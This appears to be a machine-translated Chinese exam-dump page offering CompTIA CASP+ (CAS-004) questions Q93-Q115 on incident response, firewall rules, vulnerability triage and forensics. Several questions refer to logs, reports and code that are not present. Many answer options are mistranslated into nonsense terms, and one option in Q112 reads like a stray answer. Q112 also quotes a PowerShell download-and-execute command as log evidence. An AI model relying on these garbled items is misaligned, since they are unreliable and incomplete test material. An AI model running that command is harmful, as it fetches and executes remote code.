CAS-004 实际问题答案 PDF 100% Cover 真实考试问题 [Q93-Q115]

2 月 13, 20232 月 13, 2023 考试CAS-004 实际问题答案 PDF 100% Cover 真实考试问题 [Q93-Q115] 0 条评论

標籤: CAS-004 考试试卷, CAS-004 最新测试费用, CAS-004 模拟练习, CAS-004 可靠的真实测试答案, CAS-004 有效测试 pass4sure

给本帖评分

CAS-004 实际问题答案 PDF 100% Cover 真实考试问题

CAS-004 考试问题与答案

CompTIA CASP+ 考试认证详情：

样本问题	CompTIA CASP+ 样本问题
考试价格	$466 (USD)
考试时间表	CompTIA 市场培生 VUE
持续时间	165 分钟
书籍/培训	CASP+ CAS-004
考试名称	CompTIA 高级安全从业人员 (CASP+)
问题数量	90

Q93. 分析人员对一个面向互联网的 DNS 服务器进行了漏洞扫描，并收到以下报告：

分析人员应首先使用以下哪种工具来验证最关键的漏洞？

密码破解器

端口扫描器

账户调查员

开发框架

Q94. 在调查一起安全事件时，分析人员发现有证据表明一名用户打开了一个来历不明的电子邮件附件。用户打开附件后不久，一组服务器出现大量网络和资源活动。在对服务器进行调查后，分析师发现服务器被勒索软件加密，勒索软件要求在 48 小时内支付赎金，否则将销毁所有数据。公司没有针对勒索软件的应对计划。
向管理团队报告事件后，分析员应采取的下一个步骤是？

在 48 小时内支付赎金。

隔离服务器，防止传播。

通知执法部门。

要求立即恢复受影响的服务器。

Q95. 在接到潜在入侵报告后，作为组织事件响应程序的一部分，安全工程师会立即创建相关服务器的取证镜像。为了确保镜像的完整性，必须采取哪些措施？

图像必须受密码保护，以防更改。

必须计算图像的哈希值。

包含映像的磁盘必须放置在安全的容器中。

必须保留一份图像副本

Q96. 一位安全架构师正在审查以下建议的企业防火墙架构和配置：

两台防火墙都是有状态的，并提供第 7 层过滤和路由选择功能。公司有以下要求：
网络服务器必须通过 HTTP/S 从企业网络接收所有更新。
网络服务器不应主动与互联网通信。
网络服务器只能连接到预先批准的企业数据库服务器。
员工的计算设备只能通过 80 和 443 端口连接网络服务。
为确保以最安全的方式满足所有要求，架构师应建议采用以下哪种方法？

在 Firewall_A 中添加以下内容： 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

在 Firewall_A 中添加以下内容： 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

在 Firewall_A 中添加以下内容： 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

在 Firewall_B 中添加以下内容： 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

在 Firewall_B 中添加以下内容： 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

在 Firewall_B 中添加以下内容： 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

Q97. 一家大型银行使用多家第三方机构提供服务，该银行的首席信息官（CIO）对各方处理客户数据的方式和安全性表示担忧。应实施以下哪项措施才能最好地管理风险？

成立审查委员会，评估供应商的重要性，并根据合同续签情况对供应商进行排序。在续签合同时，将设计和运营控制纳入合同，并加入审计权条款。由专门的风险管理团队定期评估供应商续约后的情况。

建立一个由一线风险、业务部门和供应商管理层成员组成的团队，仅对所有供应商的设计安全控制进行评估。将审查结果存储在数据库中，供所有其他业务部门和风险团队参考。

制定审计计划，定期审查所有供应商，无论其访问的数据、访问数据的方式和数据类型如何，根据最佳实践标准审查所有设计和操作控制，并将审查结果反馈给上级管理层。

制定一项治理计划，根据供应商对数据的访问权限、数据类型以及访问数据的方式对供应商进行评级根据供应商的评级指定关键控制措施，并对其进行审查和管理。向依赖供应商和各种风险团队的单位报告调查结果。

Q98. 一个组织正在规划灾难恢复和连续运作。
说明
查看以下情景和说明。将每个相关结果与受影响的主机匹配。
将情景 3 与适当的主机关联后，单击主机，为该发现选择适当的纠正措施。
每项发现可多次使用。
如果您想恢复模拟的初始状态，请点击 "全部重置 "按钮。

Q99. 一位安全分析师正在审查以下漏洞评估报告：

应首先修补以下哪项，以最大限度地减少针对面向互联网主机的攻击？

服务器1

服务器2

服务器 3

服务器

Q100. 某公司怀疑一台网络服务器可能已被竞争对手公司渗透。安全工程师查看了网络服务器日志，发现以下情况：

安全工程师与开发人员一起查看代码，他们确定日志条目是在运行以下行时创建的：

以下哪项是公司应实施的适当安全控制？

将目录权限限制为只读访问。

使用服务器端处理，避免路径输入中的 XSS 漏洞。

将系统调用中的项目分开，以防止命令注入。

在路径变量中设置查询参数，防止 SQL 注入。

Q101. 某公司不允许员工在国际旅行期间访问公司系统。公司电子邮件系统被配置为阻止基于地理位置的登录，但一些员工报告说，他们的手机在旅行途中仍能同步电子邮件。以下哪种情况最有可能？(请选择两项）。

过时的升级攻击

权限升级攻击

移动设备上的 VPN

不受限制的电子邮件管理员账户

主要使用 UDP 协议

禁用移动设备上的 GPS

Q102. 某公司希望加强网络安全防御，并将重点放在网络基础设施上。该解决方案不能影响公司服务的可用性，以确保误报不会导致合法流量下降。
以下哪项符合要求？

NIDS

NIPS

WAF

反向代理

参考资料
https://owasp.org/www-community/controls/Intrusion_Detection

Q103. 一名安全分析师正在调查员工向安全团队发送的一系列可疑电子邮件。这些电子邮件似乎来自当前的业务合作伙伴，不包含图片或 URL。公司使用的安全工具没有从邮件中剥离图片或 URL，相反，这些邮件只包含以下纯文本内容。

安全分析员应执行以下哪项工作？

联系业务合作伙伴的安全部门，提醒他们注意电子邮件事件。

在外围防火墙上阻止业务合作伙伴的 IP 地址。

将受影响员工的设备从网络中撤出，以防这些设备感染零日病毒。

配置电子邮件网关，自动隔离来自业务合作伙伴的所有邮件。

Q104. 在一个网络应用程序上发现了一个高度严重的漏洞，并将其引入到企业中。该漏洞可能允许未经授权的用户利用开放源代码库查看特权用户信息。企业不愿承担风险，但开发人员无法立即修复该问题。
在问题得到解决之前，应采取以下哪种措施将风险降低到可接受的水平？

使用静态代码分析器扫描代码，更改特权用户密码，并提供安全培训。

更改权限用户名、查看操作系统日志并部署硬件令牌。

实施 MFA、查看应用程序日志并部署 WAF。

部署 VPN，配置官方开源库，并对应用程序进行全面的漏洞审查。

Q105. 某公司的 SOC 收到威胁情报，称有人正在利用某个特定漏洞发起攻击。
该公司希望确定自己是否容易受到这一积极活动的影响。
公司应采用以下哪种方法做出这一决定？

狩猎威胁

系统渗透测试

在 SIEM 工具内进行日志分析

网络杀手链

Q106. 审计员正在查看网络应用程序的日志，以确定事件的来源。网络应用程序架构包括一个可通过互联网访问的应用程序负载平衡器、一个专用子网中的多个网络服务器、应用程序服务器和一个分层配置的数据库服务器。应用程序负载平衡器无法存储日志。以下是日志示例片段：

审计员应建议采取以下哪项措施，以确保今后的事件可以追溯到源头？

在负载平衡器中启用 x-Forwarded-For 标头。

在应用服务器上安装基于软件的 HIDS。

安装由可信 CA 签发的证书。

在数据库服务器上使用存储过程。

存储网络服务器接收到的 $_server ( ' REMOTE_ADDR ' ] 的值。

Q107. 开发人员正在为一家公司创建一个新的移动应用程序。该应用程序使用 REST API 和 TLS 1.2 与外部后端服务器进行安全通信。由于采用了这种配置，公司担心会受到 HTTPS 拦截攻击。
以下哪项是防范此类攻击的最佳解决方案？

曲奇

通配符证书

HSTS

证书别针

Q108. 一位漏洞分析师在一家公司内部开发的软件中发现了一个零时差漏洞。由于当前的漏洞管理系统没有针对该漏洞的任何检查，因此要求一名工程师创建一个漏洞管理系统。
以下哪项最适合满足这些要求？

ARF

ISACs

Node.js

奥维尔

Q109. 在对告诉集成控制系统输出多少电力的控制信息应用加密技术时，以下哪项是最重要的安全目标？

导入信息的可用性

确保信息不可抵赖

执行信息的协议一致性

确保信息的完整性

Q110. 来自 MDM 软件的设备事件日志源如下：

以下哪些安全问题和应对措施可以 BEST 解决日志中设备带来的风险？

恶意安装应用程序；更改 MDM 配置，删除应用程序 ID 1220。

资源泄漏；恢复设备进行分析并清理本地存储。

不可能的旅行；在调查期间禁用设备的账户和访问。

伪造状态报告；远程擦除设备。

Q111. 一名安全分析师注意到 SIEM 事件显示了以下活动：

分析员应首先采取以下哪种应对措施？

在所有 Microsoft Windows 端点上禁用 powershell.exe。

重新启动 Microsoft Windows Defender。

配置转发代理阻止 40.90.23.154。

禁用端点的本地管理员权限。

Q112. 一名安全分析人员注意到，登录外部邮件服务器失败的尝试次数持续增加。在对其中一个跳转箱进行调查时，分析员在日志文件中发现了以下内容：Powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
以下哪项安全控制措施会发出警报并阻止下一阶段的攻击？

杀毒软件和 UEBA

反向代理和沙箱

电子数据记录仪和申请核准清单

前向代理和 MFA

EDR 和白名单应能防止这种攻击。

Q113. 一家公司屡次遭到黑客入侵，他们使用的是有效凭证。公司的首席信息安全官（CISO）为验证用户身份安装了多种控制措施，包括生物识别和基于令牌的因素。每一种控制措施都增加了开销和复杂性，但却无法阻止进一步的入侵。一名外部顾问正在评估当前支持身份验证控制的流程。以下哪项建议最有可能降低未经授权访问的风险？

实施严格的三因素身份验证。

实施最小权限政策

切换到一次性授权或所有用户授权。

加强身份验证程序

Q114. 漏洞评估端点生成了一份最新发现报告。安全分析员需要查看报告，并创建必须处理的项目的优先级列表。该分析员应使用以下哪种方法快速创建列表？

业务影响评级

CVE 日期

CVSS 分数

奥维尔

Q115. 某公司希望保护其知识产权不被窃取。该公司已经应用了 ACL 和 DAC。
公司应使用以下哪种方法来防止数据被盗？

水印

DRM